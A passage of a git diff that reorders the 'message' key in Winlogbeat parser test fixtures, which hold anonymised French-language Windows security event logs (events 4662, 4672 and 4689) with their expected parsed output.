:\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}" + } }, "expected": { "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json index 59c3d35b3..ec935a02c 100644 --- a/Beats/winlogbeat/tests/security_event_4672.json +++ b/Beats/winlogbeat/tests/security_event_4672.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json index e5beffcf5..22840d53c 100644 --- a/Beats/winlogbeat/tests/security_event_4689.json +++ b/Beats/winlogbeat/tests/security_event_4689.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process 